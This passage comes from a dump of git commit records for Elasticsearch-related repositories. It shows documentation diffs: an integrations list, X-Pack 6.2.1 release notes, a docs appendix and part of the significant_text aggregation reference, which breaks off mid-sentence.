hafkensite\/elasticsearch,pozhidaevak\/elasticsearch,scottsom\/elasticsearch,MisterAndersen\/elasticsearch,EasonYi\/elasticsearch,Flipkart\/elasticsearch,Kakakakakku\/elasticsearch,AleksKochev\/elasticsearch,wbowling\/elasticsearch,vrkansagara\/elasticsearch,rhoml\/elasticsearch,njlawton\/elasticsearch,loconsolutions\/elasticsearch,boliza\/elasticsearch,girirajsharma\/elasticsearch,Asimov4\/elasticsearch,pablocastro\/elasticsearch,rajanm\/elasticsearch,Rygbee\/elasticsearch,LewayneNaidoo\/elasticsearch,dylan8902\/elasticsearch,fekaputra\/elasticsearch,masterweb121\/elasticsearch,ajhalani\/elasticsearch,dongjoon-hyun\/elasticsearch,javachengwc\/elasticsearch,caengcjd\/elasticsearch,iantruslove\/elasticsearch,xuzha\/elasticsearch,episerver\/elasticsearch,elancom\/elasticsearch,HarishAtGitHub\/elasticsearch,Shekharrajak\/elasticsearch,elancom\/elasticsearch,MjAbuz\/elasticsearch,sreeramjayan\/elasticsearch,maddin2016\/elasticsearch,LewayneNaidoo\/elasticsearch,heng4fun\/elasticsearch,apepper\/elasticsearch,kcompher\/elasticsearch,AndreKR\/elasticsearch,iacdingping\/elasticsearch,fred84\/elasticsearch,kcompher\/elasticsearch,wenpos\/elasticsearch,mjhennig\/elasticsearch,awislowski\/elasticsearch,pranavraman\/elasticsearch,jsgao0\/elasticsearch,schonfeld\/elasticsearch,umeshdangat\/elasticsearch,mmaracic\/elasticsearch,apepper\/elasticsearch,Rygbee\/elasticsearch,henakamaMSFT\/elasticsearch,pablocastro\/elasticsearch,episerver\/elasticsearch,JSCooke\/elasticsearch,masaruh\/elasticsearch,LeoYao\/elasticsearch,vietlq\/elasticsearch,jw0201\/elastic,ckclark\/elasticsearch,xpandan\/elasticsearch,scorpionvicky\/elasticsearch,andrewvc\/elasticsearch,areek\/elasticsearch,StefanGor\/elasticsearch,girirajsharma\/elasticsearch,shreejay\/elasticsearch,lightslife\/elasticsearch,snikch\/elasticsearch,aparo\/elasticsearch,acchen97\/elasticsearch,vroyer\/elassandra,rajanm\/elasticsearch,uschindler\/elasticsearch,salyh\/elasticsearch,knight1128\/elasticsearch,MetSystem\/elasticsearch,umeshdangat\/elasticsearch,KimTaehee\/elasticsearch,Liziyao\/elasticsearch,IanvsPoplicola\/elasticsearch,spiegela\/elasticsearch,weipinghe\/elasticsearch,ivansun1010\/elasticsearch,markharwood\/elasticsearch,rento19962\/elasticsearch,feiqitian\/elasticsearch,Kakakakakku\/elasticsearch,truemped\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,amit-shar\/elasticsearch,mkis-\/elasticsearch,ulkas\/elasticsearch,loconsolutions\/elasticsearch,areek\/elasticsearch,AndreKR\/elasticsearch,Helen-Zhao\/elasticsearch,davidvgalbraith\/elasticsearch,henakamaMSFT\/elasticsearch,uboness\/elasticsearch,bawse\/elasticsearch,golubev\/elasticsearch,janmejay\/elasticsearch,hafkensite\/elasticsearch,petabytedata\/elasticsearch,kalburgimanjunath\/elasticsearch,KimTaehee\/elasticsearch,mrorii\/elasticsearch,strapdata\/elassandra,petmit\/elasticsearch,Chhunlong\/elasticsearch,achow\/elasticsearch,opendatasoft\/elasticsearch,scottsom\/elasticsearch,MichaelLiZhou\/elasticsearch,spiegela\/elasticsearch,EasonYi\/elasticsearch,wangtuo\/elasticsearch,lks21c\/elasticsearch,F0lha\/elasticsearch,hydro2k\/elasticsearch,strapdata\/elassandra5-rc,pritishppai\/elasticsearch,tsohil\/elasticsearch,wbowling\/elasticsearch,kenshin233\/elasticsearch,amaliujia\/elasticsearch,combinatorist\/elasticsearch,wuranbo\/elasticsearch,nezirus\/elasticsearch,koxa29\/elasticsearch,dongjoon-hyun\/elasticsearch,shreejay\/elasticsearch,girirajsharma\/elasticsearch,awislowski\/elasticsearch,beiske\/elasticsearch,fooljohnny\/elasticsearch,yuy168\/elasticsearch,masaruh\/elasticsearch,LewayneNaidoo\/elasticsearch,JackyMai\/elasticsearch,queirozfcom\/elasticsearch,raishiv\/elasticsearch,tahaemin\/elasticsearch,abibell\/elasticsearch,kimchy\/elasticsearch,a2lin\/elasticsearch,slavau\/elasticsearch,JackyMai\/elasticsearch,alexkuk\/elasticsearch,yynil\/elasticsearch,GlenRSmith\/elasticsearch,salyh\/elasticsearch,socialrank\/elasticsearch,sdauletau\/elasticsearch,Rygbee\/elasticsearch,alexkuk\/elasticsearch,himanshuag\/elasticsearch,anti-social\/elasticsearch,petmit\/elasticsearch,lightslife\/elasticsearch,diendt\/elasticsearch,franklanganke\/elasticsearch,jango2015\/elasticsearch,trangvh\/elasticsearch,IanvsPoplicola\/elasticsearch,jaynblue\/elasticsearch,wittyameta\/elasticsearch,shreejay\/elasticsearch,springning\/elasticsearch,tebriel\/elasticsearch,Charlesdong\/elasticsearch,zeroctu\/elasticsearch,mmaracic\/elasticsearch,amit-shar\/elasticsearch,iacdingping\/elasticsearch,mkis-\/elasticsearch,kcompher\/elasticsearch,phani546\/elasticsearch,nezirus\/elasticsearch,hanst\/elasticsearch,achow\/elasticsearch,NBSW\/elasticsearch,mrorii\/elasticsearch,andrestc\/elasticsearch,mapr\/elasticsearch,PhaedrusTheGreek\/elasticsearch,nomoa\/elasticsearch,himanshuag\/elasticsearch,Asimov4\/elasticsearch,pozhidaevak\/elasticsearch,milodky\/elasticsearch,nrkkalyan\/elasticsearch,cwurm\/elasticsearch,iacdingping\/elasticsearch,petabytedata\/elasticsearch,MisterAndersen\/elasticsearch,fforbeck\/elasticsearch,slavau\/elasticsearch,tkssharma\/elasticsearch,jchampion\/elasticsearch,Microsoft\/elasticsearch,jpountz\/elasticsearch,huypx1292\/elasticsearch,lks21c\/elasticsearch,njlawton\/elasticsearch,infusionsoft\/elasticsearch,mcku\/elasticsearch,Helen-Zhao\/elasticsearch,rhoml\/elasticsearch,fekaputra\/elasticsearch,wimvds\/elasticsearch,mmaracic\/elasticsearch,jeteve\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,qwerty4030\/elasticsearch,kimchy\/elasticsearch,ThalaivaStars\/OrgRepo1,kevinkluge\/elasticsearch,vrkansagara\/elasticsearch,mbrukman\/elasticsearch,strapdata\/elassandra5-rc,avikurapati\/elasticsearch,PhaedrusTheGreek\/elasticsearch,Shepard1212\/elasticsearch,lzo\/elasticsearch-1,mrorii\/elasticsearch,kevinkluge\/elasticsearch,huypx1292\/elasticsearch,zeroctu\/elasticsearch,sscarduzio\/elasticsearch,vingupta3\/elasticsearch,fernandozhu\/elasticsearch,martinstuga\/elasticsearch,trangvh\/elasticsearch,zkidkid\/elasticsearch,libosu\/elasticsearch,mikemccand\/elasticsearch,lmtwga\/elasticsearch,kalburgimanjunath\/elasticsearch,maddin2016\/elasticsearch,VukDukic\/elasticsearch,javachengwc\/elasticsearch,ulkas\/elasticsearch,huanzhong\/elasticsearch,franklanganke\/elasticsearch,tkssharma\/elasticsearch,acchen97\/elasticsearch,tsohil\/elasticsearch,Collaborne\/elasticsearch,obourgain\/elasticsearch,HarishAtGitHub\/elasticsearch,trangvh\/elasticsearch,heng4fun\/elasticsearch,alexkuk\/elasticsearch,jango2015\/elasticsearch,pablocastro\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,lzo\/elasticsearch-1,MetSystem\/elasticsearch,cnfire\/elasticsearch-1,caengcjd\/elasticsearch,MetSystem\/elasticsearch,boliza\/elasticsearch,lydonchandra\/elasticsearch,alexshadow007\/elasticsearch,artnowo\/elasticsearch,ouyangkongtong\/elasticsearch,lzo\/elasticsearch-1,jw0201\/elastic,combinatorist\/elasticsearch,overcome\/elasticsearch,diendt\/elasticsearch,djschny\/elasticsearch,easonC\/elasticsearch,ESamir\/elasticsearch,ckclark\/elasticsearch,caengcjd\/elasticsearch,sposam\/elasticsearch,obourgain\/elasticsearch,hanswang\/elasticsearch,masterweb121\/elasticsearch,sjohnr\/elasticsearch,ricardocerq\/elasticsearch,phani546\/elasticsearch,ydsakyclguozi\/elasticsearch,beiske\/elasticsearch,MichaelLiZhou\/elasticsearch,liweinan0423\/elasticsearch,dongjoon-hyun\/elasticsearch,masterweb121\/elasticsearch,likaiwalkman\/elasticsearch,LeoYao\/elasticsearch,TonyChai24\/ESSource,fubuki\/elasticsearch,dylan8902\/elasticsearch,dpursehouse\/elasticsearch,ydsakyclguozi\/elasticsearch,schonfeld\/elasticsearch,clintongormley\/elasticsearch,tkssharma\/elasticsearch,tahaemin\/elasticsearch,hydro2k\/elasticsearch,btiernay\/elasticsearch,wayeast\/elasticsearch,lydonchandra\/elasticsearch,vroyer\/elassandra,wittyameta\/elasticsearch,franklanganke\/elasticsearch,clintongormley\/elasticsearch,wimvds\/elasticsearch,strapdata\/elassandra-test,linglaiyao1314\/elasticsearch,spiegela\/elasticsearch,wayeast\/elasticsearch,sdauletau\/elasticsearch,ivansun1010\/elasticsearch,xpandan\/elasticsearch,StefanGor\/elasticsearch,fforbeck\/elasticsearch,KimTaehee\/elasticsearch,opendatasoft\/elasticsearch,mgalushka\/elasticsearch,achow\/elasticsearch,mikemccand\/elasticsearch,lydonchandra\/elasticsearch,Widen\/elasticsearch,jprante\/elasticsearch,nazarewk\/elasticsearch,acchen97\/elasticsearch,pritishppai\/elasticsearch,F0lha\/elasticsearch,sauravmondallive\/elasticsearch,dantuffery\/elasticsearch,yanjunh\/elasticsearch,codebunt\/elasticsearch,scottsom\/elasticsearch,jbertouch\/elasticsearch,rhoml\/elasticsearch,wittyameta\/elasticsearch,bestwpw\/elasticsearch,rento19962\/elasticsearch,slavau\/elasticsearch,mjason3\/elasticsearch,abibell\/elasticsearch,Liziyao\/elasticsearch,dantuffery\/elasticsearch,tkssharma\/elasticsearch,wayeast\/elasticsearch,kcompher\/elasticsearch,elasticdog\/elasticsearch,maddin2016\/elasticsearch,Liziyao\/elasticsearch,yuy168\/elasticsearch,thecocce\/elasticsearch,alexshadow007\/elasticsearch,s1monw\/elasticsearch,areek\/elasticsearch,khiraiwa\/elasticsearch,ThalaivaStars\/OrgRepo1,KimTaehee\/elasticsearch,Flipkart\/elasticsearch,jango2015\/elasticsearch,javachengwc\/elasticsearch,janmejay\/elasticsearch,feiqitian\/elasticsearch,jchampion\/elasticsearch,Shepard1212\/elasticsearch,kubum\/elasticsearch,andrestc\/elasticsearch,18098924759\/elasticsearch,mapr\/elasticsearch,btiernay\/elasticsearch,sauravmondallive\/elasticsearch,koxa29\/elasticsearch,alexbrasetvik\/elasticsearch,socialrank\/elasticsearch,acchen97\/elasticsearch,mnylen\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,Clairebi\/ElasticsearchClone,HonzaKral\/elasticsearch,ESamir\/elasticsearch,mm0\/elasticsearch,jsgao0\/elasticsearch,loconsolutions\/elasticsearch,lzo\/elasticsearch-1,kenshin233\/elasticsearch,lmtwga\/elasticsearch,kunallimaye\/elasticsearch,apepper\/elasticsearch,zhaocloud\/elasticsearch,kcompher\/elasticsearch,C-Bish\/elasticsearch,uboness\/elasticsearch,kubum\/elasticsearch,ivansun1010\/elasticsearch,markwalkom\/elasticsearch,geidies\/elasticsearch,huypx1292\/elasticsearch,njlawton\/elasticsearch,jsgao0\/elasticsearch,abhijitiitr\/es,sscarduzio\/elasticsearch,janmejay\/elasticsearch,kimchy\/elasticsearch,yongminxia\/elasticsearch,MaineC\/elasticsearch,LeoYao\/elasticsearch,pranavraman\/elasticsearch,apepper\/elasticsearch,avikurapati\/elasticsearch,mortonsykes\/elasticsearch,nrkkalyan\/elasticsearch,MjAbuz\/elasticsearch,kingaj\/elasticsearch,jpountz\/elasticsearch,mkis-\/elasticsearch,GlenRSmith\/elasticsearch,dataduke\/elasticsearch,glefloch\/elasticsearch,drewr\/elasticsearch,lmtwga\/elasticsearch,areek\/elasticsearch,vrkansagara\/elasticsearch,jprante\/elasticsearch,djschny\/elasticsearch,codebunt\/elasticsearch,iamjakob\/elasticsearch,lzo\/elasticsearch-1,queirozfcom\/elasticsearch,i-am-Nathan\/elasticsearch,knight1128\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,vrkansagara\/elasticsearch,dongjoon-hyun\/elasticsearch,bawse\/elasticsearch,vvcephei\/elasticsearch,jsgao0\/elasticsearch,fred84\/elasticsearch,huypx1292\/elasticsearch,humandb\/elasticsearch,kalimatas\/elasticsearch,zhiqinghuang\/elasticsearch,Siddartha07\/elasticsearch,Fsero\/elasticsearch,szroland\/elasticsearch,hanst\/elasticsearch,Collaborne\/elasticsearch,spiegela\/elasticsearch,jchampion\/elasticsearch,karthikjaps\/elasticsearch,mortonsykes\/elasticsearch,hanswang\/elasticsearch,F0lha\/elasticsearch,pranavraman\/elasticsearch,kingaj\/elasticsearch,jchampion\/elasticsearch,aparo\/elasticsearch,Widen\/elasticsearch,sauravmondallive\/elasticsearch,pozhidaevak\/elasticsearch,sarwarbhuiyan\/elasticsearch,fekaputra\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,elancom\/elasticsearch,Widen\/elasticsearch,smflorentino\/elasticsearch,TonyChai24\/ESSource,sdauletau\/elasticsearch,HonzaKral\/elasticsearch,rajanm\/elasticsearch,kalburgimanjunath\/elasticsearch,springning\/elasticsearch,yongminxia\/elasticsearch,tkssharma\/elasticsearch,geidies\/elasticsearch,amit-shar\/elasticsearch,loconsolutions\/elasticsearch,nomoa\/elasticsearch,henakamaMSFT\/elasticsearch,MjAbuz\/elasticsearch,snikch\/elasticsearch,ouyangkongtong\/elasticsearch,elancom\/elasticsearch,fred84\/elasticsearch,Microsoft\/elasticsearch,Ansh90\/elasticsearch,likaiwalkman\/elasticsearch,wuranbo\/elasticsearch,heng4fun\/elasticsearch,overcome\/elasticsearch,strapdata\/elassandra,janmejay\/elasticsearch,artnowo\/elasticsearch,martinstuga\/elasticsearch,chirilo\/elasticsearch,milodky\/elasticsearch,mmaracic\/elasticsearch,jchampion\/elasticsearch,kaneshin\/elasticsearch,scorpionvicky\/elasticsearch,EasonYi\/elasticsearch,YosuaMichael\/elasticsearch,i-am-Nathan\/elasticsearch,libosu\/elasticsearch,mcku\/elasticsearch,sc0ttkclark\/elasticsearch,rhoml\/elasticsearch,hafkensite\/elasticsearch,kalburgimanjunath\/elasticsearch,combinatorist\/elasticsearch,nknize\/elasticsearch,btiernay\/elasticsearch,andrejserafim\/elasticsearch,bestwpw\/elasticsearch,lks21c\/elasticsearch,rento19962\/elasticsearch,schonfeld\/elasticsearch,sscarduzio\/elasticsearch,iantruslove\/elasticsearch,rmuir\/elasticsearch,kingaj\/elasticsearch,infusionsoft\/elasticsearch,pozhidaevak\/elasticsearch,ouyangkongtong\/elasticsearch,AleksKochev\/elasticsearch,strapdata\/elassandra,huanzhong\/elasticsearch,onegambler\/elasticsearch,kenshin233\/elasticsearch,palecur\/elasticsearch,YosuaMichael\/elasticsearch,djschny\/elasticsearch,luiseduardohdbackup\/elasticsearch,mohsinh\/elasticsearch,hydro2k\/elasticsearch,vietlq\/elasticsearch,sneivandt\/elasticsearch,pritishppai\/elasticsearch,masterweb121\/elasticsearch,wayeast\/elasticsearch,rmuir\/elasticsearch,ivansun1010\/elasticsearch,mbrukman\/elasticsearch,NBSW\/elasticsearch,combinatorist\/elasticsearch,jeteve\/elasticsearch,sposam\/elasticsearch,dylan8902\/elasticsearch,winstonewert\/elasticsearch,lmtwga\/elasticsearch,dongjoon-hyun\/elasticsearch,vingupta3\/elasticsearch,apepper\/elasticsearch,LeoYao\/elasticsearch,fernandozhu\/elasticsearch,Shekharrajak\/elasticsearch,MisterAndersen\/elasticsearch,likaiwalkman\/elasticsearch","old_file":"docs\/community\/integrations.asciidoc","new_file":"docs\/community\/integrations.asciidoc","new_contents":"[[integrations]]\n== Integrations\n\n\n* http:\/\/grails.org\/plugin\/elasticsearch[Grails]:\n ElasticSearch Grails plugin.\n\n* https:\/\/github.com\/carrot2\/elasticsearch-carrot2[carrot2]:\n Results clustering with carrot2\n\n* https:\/\/github.com\/angelf\/escargot[escargot]:\n ElasticSearch connector for Rails (WIP).\n\n* https:\/\/metacpan.org\/module\/Catalyst::Model::Search::ElasticSearch[Catalyst]:\n ElasticSearch and Catalyst integration.\n\n* http:\/\/github.com\/aparo\/django-elasticsearch[django-elasticsearch]:\n Django ElasticSearch Backend.\n\n* http:\/\/github.com\/Aconex\/elasticflume[elasticflume]:\n http:\/\/github.com\/cloudera\/flume[Flume] sink implementation.\n\n* http:\/\/code.google.com\/p\/terrastore\/wiki\/Search_Integration[Terrastore Search]:\n http:\/\/code.google.com\/p\/terrastore\/[Terrastore] integration module with elasticsearch.\n\n* https:\/\/github.com\/infochimps\/wonderdog[Wonderdog]:\n Hadoop bulk loader into elasticsearch.\n\n* http:\/\/geeks.aretotally.in\/play-framework-module-elastic-search-distributed-searching-with-json-http-rest-or-java[Play!Framework]:\n Integrate with Play! Framework Application.\n\n* https:\/\/github.com\/Exercise\/FOQElasticaBundle[ElasticaBundle]:\n Symfony2 Bundle wrapping Elastica.\n\n* http:\/\/drupal.org\/project\/elasticsearch[Drupal]:\n Drupal ElasticSearch integration.\n\n* https:\/\/github.com\/refuge\/couch_es[couch_es]:\n elasticsearch helper for couchdb based products (apache couchdb, bigcouch & refuge)\n\n* https:\/\/github.com\/sonian\/elasticsearch-jetty[Jetty]:\n Jetty HTTP Transport\n\n* https:\/\/github.com\/dadoonet\/spring-elasticsearch[Spring Elasticsearch]:\n Spring Factory for Elasticsearch\n\n* https:\/\/camel.apache.org\/elasticsearch.html[Apache Camel Integration]:\n An Apache camel component to integrate elasticsearch\n\n* https:\/\/github.com\/tlrx\/elasticsearch-test[elasticsearch-test]:\n Elasticsearch Java annotations for unit testing with\n http:\/\/www.junit.org\/[JUnit]\n\n* http:\/\/searchbox-io.github.com\/wp-elasticsearch\/[Wp-ElasticSearch]:\n ElasticSearch WordPress Plugin\n\n* https:\/\/github.com\/OlegKunitsyn\/eslogd[eslogd]:\n Linux daemon that replicates events to a central ElasticSearch server in real-time\n\n* https:\/\/github.com\/drewr\/elasticsearch-clojure-repl[elasticsearch-clojure-repl]:\n Plugin that embeds nREPL for run-time introspective adventure! Also\n serves as an nREPL transport.\n\n* http:\/\/haystacksearch.org\/[Haystack]:\n Modular search for Django\n\n* https:\/\/github.com\/cleverage\/play2-elasticsearch[play2-elasticsearch]:\n ElasticSearch module for Play Framework 2.x\n\n* https:\/\/github.com\/fullscale\/dangle[dangle]:\n A set of AngularJS directives that provide common visualizations for elasticsearch based on\n D3.\n\n* https:\/\/github.com\/roundscope\/ember-data-elasticsearch-kit[ember-data-elasticsearch-kit]:\n An ember-data kit for both pushing and querying objects to ElasticSearch cluster\n","old_contents":"[[integrations]]\n== Integrations\n\n\n* http:\/\/grails.org\/plugin\/elasticsearch[Grails]:\n ElasticSearch Grails plugin.\n\n* https:\/\/github.com\/carrot2\/elasticsearch-carrot2[carrot2]:\n Results clustering with carrot2\n\n* https:\/\/github.com\/angelf\/escargot[escargot]:\n ElasticSearch connector for Rails (WIP).\n\n* https:\/\/metacpan.org\/module\/Catalyst::Model::Search::ElasticSearch[Catalyst]:\n ElasticSearch and Catalyst integration.\n\n* http:\/\/github.com\/aparo\/django-elasticsearch[django-elasticsearch]:\n Django ElasticSearch Backend.\n\n* http:\/\/github.com\/Aconex\/elasticflume[elasticflume]:\n http:\/\/github.com\/cloudera\/flume[Flume] sink implementation.\n\n* http:\/\/code.google.com\/p\/terrastore\/wiki\/Search_Integration[Terrastore Search]:\n http:\/\/code.google.com\/p\/terrastore\/[Terrastore] integration module with elasticsearch.\n\n* https:\/\/github.com\/infochimps\/wonderdog[Wonderdog]:\n Hadoop bulk loader into elasticsearch.\n\n* http:\/\/geeks.aretotally.in\/play-framework-module-elastic-search-distributed-searching-with-json-http-rest-or-java[Play!Framework]:\n Integrate with Play! Framework Application.\n\n* https:\/\/github.com\/Exercise\/FOQElasticaBundle[ElasticaBundle]:\n Symfony2 Bundle wrapping Elastica.\n\n* http:\/\/drupal.org\/project\/elasticsearch[Drupal]:\n Drupal ElasticSearch integration.\n\n* https:\/\/github.com\/refuge\/couch_es[couch_es]:\n elasticsearch helper for couchdb based products (apache couchdb, bigcouch & refuge)\n\n* https:\/\/github.com\/sonian\/elasticsearch-jetty[Jetty]:\n Jetty HTTP Transport\n\n* https:\/\/github.com\/dadoonet\/spring-elasticsearch[Spring Elasticsearch]:\n Spring Factory for Elasticsearch\n\n* https:\/\/camel.apache.org\/elasticsearch.html[Apache Camel Integration]:\n An Apache camel component to integrate elasticsearch\n\n* https:\/\/github.com\/tlrx\/elasticsearch-test[elasticsearch-test]:\n Elasticsearch Java annotations for unit testing with\n http:\/\/www.junit.org\/[JUnit]\n\n* http:\/\/searchbox-io.github.com\/wp-elasticsearch\/[Wp-ElasticSearch]:\n ElasticSearch WordPress Plugin\n\n* https:\/\/github.com\/OlegKunitsyn\/eslogd[eslogd]:\n Linux daemon that replicates events to a central ElasticSearch server in real-time\n\n* https:\/\/github.com\/drewr\/elasticsearch-clojure-repl[elasticsearch-clojure-repl]:\n Plugin that embeds nREPL for run-time introspective adventure! Also\n serves as an nREPL transport.\n\n* http:\/\/haystacksearch.org\/[Haystack]:\n Modular search for Django\n\n* https:\/\/github.com\/cleverage\/play2-elasticsearch[play2-elasticsearch]:\n ElasticSearch module for Play Framework 2.x\n\n* https:\/\/github.com\/fullscale\/dangle[dangle]:\n A set of AngularJS directives that provide common visualizations for elasticsearch based on\n D3.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c05defe73db7ef2751109e403c0f9e9d0afc66e2","subject":"[DOCS] Drafted 6.2.1 security release notes (elastic\/x-pack-elasticsearch#3873)","message":"[DOCS] Drafted 6.2.1 security release notes (elastic\/x-pack-elasticsearch#3873)\n\nOriginal commit: elastic\/x-pack-elasticsearch@61e3f0cd993f78529f673e3d425dc92d0e99b60a\n","repos":"strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elassandra,vroyer\/elassandra","old_file":"docs\/en\/release-notes\/6.2.1.asciidoc","new_file":"docs\/en\/release-notes\/6.2.1.asciidoc","new_contents":"[role=\"xpack\"]\n[[xes-6.2.1]]\n== {es} {xpack} 6.2.1 Release Notes\n++++\n<titleabbrev>6.2.1 Release Notes<\/titleabbrev>\n++++\n\n[[xes-bug-6.2.1]]\n[float]\n=== Bug fixes\n\nSecurity::\n* Fixed missing dependencies for x-pack-transport.\n\/\/Repo: x-pack-elasticsearch\n\/\/Pull: 3860\n* Fixed `saml-metadata` env file such that it sources the appropriate\nenvironment file.\n\/\/Repo: x-pack-elasticsearch\n\/\/Pull: 3848\n* If the realm uses native role mappings and the security index health changes,\nthe realm caches are cleared. For example, they are cleared when the index\nrecovers from a red state, when the index is deleted, when the index becomes\noutdated, or when the index becomes up-to-date.\n\/\/Repo: x-pack-elasticsearch\n\/\/Pull: 3782\n","old_contents":"[role=\"xpack\"]\n[[xes-6.2.1]]\n== {es} {xpack} 6.2.1 Release Notes\n++++\n<titleabbrev>6.2.1 Release Notes<\/titleabbrev>\n++++\n\nTo be determined...\n\n\/\/\/\/\n[[xes-bug-6.2.1]]\n[float]\n=== Bug fixes\n\nSecurity::\n* Remove transport client dependency on security\n\/\/Repo: x-pack-elasticsearch\n\/\/Pull: 3860\n* [Security] Fix saml-metadata env files\n\/\/Repo: x-pack-elasticsearch\n\/\/Pull: 3848\n* [Security] Clear Realm Caches on role mapping health change\n\/\/Repo: x-pack-elasticsearch\n\/\/Pull: 3782\n* [Security] Reset IndexAuditTrail to INITIALISED before start\n\/\/Repo: x-pack-elasticsearch\n\/\/Pull: 3807\n\/\/\/\/\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7a3f0c70c982a0233369168818699d74d39693aa","subject":"Observability metadata docs conditionally available","message":"Observability metadata docs conditionally available\n\nwe will enable the metadata documentation only if we're NOT in the release train documentation","repos":"spring-cloud\/spring-cloud-task,cppwfs\/spring-cloud-task","old_file":"docs\/src\/main\/asciidoc\/appendix.adoc","new_file":"docs\/src\/main\/asciidoc\/appendix.adoc","new_contents":"\n[[appendix]]\n= Appendices\n\ninclude::appendix-task-repository-schema.adoc[]\n\ninclude::appendix-building-the-documentation.adoc[]\n\nifndef::train-docs[]\ninclude::_observability.adoc[]\nendif::[]\n\n","old_contents":"\n[[appendix]]\n= Appendices\n\ninclude::appendix-task-repository-schema.adoc[]\n\ninclude::appendix-building-the-documentation.adoc[]\n\ninclude::_observability.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2c3be1244ec61bcafe4ba0922266c30803dd9228","subject":"[Docs] Add note on limitation for significant_text with nested objects (#28052)","message":"[Docs] Add note on limitation for significant_text with nested objects (#28052)\n\nAdd section to `significant_text` documentation mentioning that it currently\r\ndoes not support use on nested objects.\r\n\r\nRelates to #28050","repos":"vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elasticassandra,vroyer\/elasticassandra,strapdata\/elassandra,vroyer\/elasticassandra","old_file":"docs\/reference\/aggregations\/bucket\/significanttext-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/bucket\/significanttext-aggregation.asciidoc","new_contents":"[[search-aggregations-bucket-significanttext-aggregation]]\n=== Significant Text Aggregation\n\nexperimental[]\n\nAn aggregation that returns interesting or unusual occurrences of free-text terms in a set.\nIt is like the <<search-aggregations-bucket-significantterms-aggregation,significant terms>> aggregation but differs in that:\n\n* It is specifically designed for use on type `text` fields\n* It does not require field data or doc-values\n* It re-analyzes text content on-the-fly meaning it can also filter duplicate sections of\nnoisy text that otherwise tend to skew statistics.\n\nWARNING: Re-analyzing _large_ result sets will require a lot of time and memory. It is recommended that the significant_text\n aggregation is used as a child of either the <<search-aggregations-bucket-sampler-aggregation,sampler>> or \n <<search-aggregations-bucket-diversified-sampler-aggregation,diversified sampler>> aggregation to limit the analysis\n to a _small_ selection of top-matching documents e.g. 200. This will typically improve speed, memory use and quality of\n results.\n\n.Example use cases:\n* Suggesting \"H5N1\" when users search for \"bird flu\" to help expand queries\n* Suggesting keywords relating to stock symbol $ATI for use in an automated news classifier\n\nIn these cases the words being selected are not simply the most popular terms in results. The most popular words tend to be\nvery boring (_and, of, the, we, I, they_ ...).\nThe significant words are the ones that have undergone a significant change in popularity measured between a _foreground_ and _background_ set.\nIf the term \"H5N1\" only exists in 5 documents in a 10 million document index and yet is found in 4 of the 100 documents that make up a user's search results\nthat is significant and probably very relevant to their search. 5\/10,000,000 vs 4\/100 is a big swing in frequency.\n\nexperimental[The `significant_text` aggregation is new and may change in non-backwards compatible ways if we add further text-analysis features e.g. phrase detection]\n\n==== Basic use\n\nIn the typical use case, the _foreground_ set of interest is a selection of the top-matching search results for a query \nand the _background_set used for statistical comparisons is the index or indices from which the results were gathered.\n\nExample:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\" : {\n \"match\" : {\"content\" : \"Bird flu\"}\n },\n \"aggregations\" : {\n \"my_sample\" : {\n \"sampler\" : {\n \"shard_size\" : 100\n },\n \"aggregations\": {\n \"keywords\" : {\n \"significant_text\" : { \"field\" : \"content\" }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\n\n\nResponse:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\": 9,\n \"timed_out\": false,\n \"_shards\": ...,\n \"hits\": ...,\n \"aggregations\" : {\n \"my_sample\": {\n \"doc_count\": 100,\n \"keywords\" : {\n \"doc_count\": 100,\n \"buckets\" : [\n {\n \"key\": \"h5n1\",\n \"doc_count\": 4,\n \"score\": 4.71235374214817,\n \"bg_count\": 5\n }\n ...\n ]\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nThe results show that \"h5n1\" is one of several terms strongly associated with bird flu.\nIt only occurs 5 times in our index as a whole (see the `bg_count`) and yet 4 of these \nwere lucky enough to appear in our 100 document sample of \"bird flu\" results. That suggests\na significant word and one which the user can potentially add to their search. \n\n\n==== Dealing with noisy data using `filter_duplicate_text`\nFree-text fields often contain a mix of original content and mechanical copies of text (cut-and-paste biographies, email reply chains, \nretweets, boilerplate headers\/footers, page navigation menus, sidebar news links, copyright notices, standard disclaimers, addresses).\n\nIn real-world data these duplicate sections of text tend to feature heavily in `significant_text` results if they aren't filtered out.\nFiltering near-duplicate text is a difficult task at index-time but we can cleanse the data on-the-fly at query time using the \n`filter_duplicate_text` setting.\n\n\nFirst let's look at an unfiltered real-world example using the http:\/\/research.signalmedia.co\/newsir16\/signal-dataset.html[Signal media dataset] of\na million news articles covering a wide variety of news. Here are the raw significant text results for a search for the articles \nmentioning \"elasticsearch\":\n\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"aggregations\": {\n \"sample\": {\n \"doc_count\": 35,\n \"keywords\": {\n \"doc_count\": 35,\n \"buckets\": [\n {\n \"key\": \"elasticsearch\",\n \"doc_count\": 35,\n \"score\": 28570.428571428572,\n \"bg_count\": 35\n },\n ...\n {\n \"key\": \"currensee\",\n \"doc_count\": 8,\n \"score\": 6530.383673469388,\n \"bg_count\": 8\n },\n ...\n {\n \"key\": \"pozmantier\",\n \"doc_count\": 4,\n \"score\": 3265.191836734694,\n \"bg_count\": 4\n },\n ...\n\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nThe uncleansed documents have thrown up some odd-looking terms that are, on the face of it, statistically \ncorrelated with appearances of our search term \"elasticsearch\" e.g. \"pozmantier\".\nWe can drill down 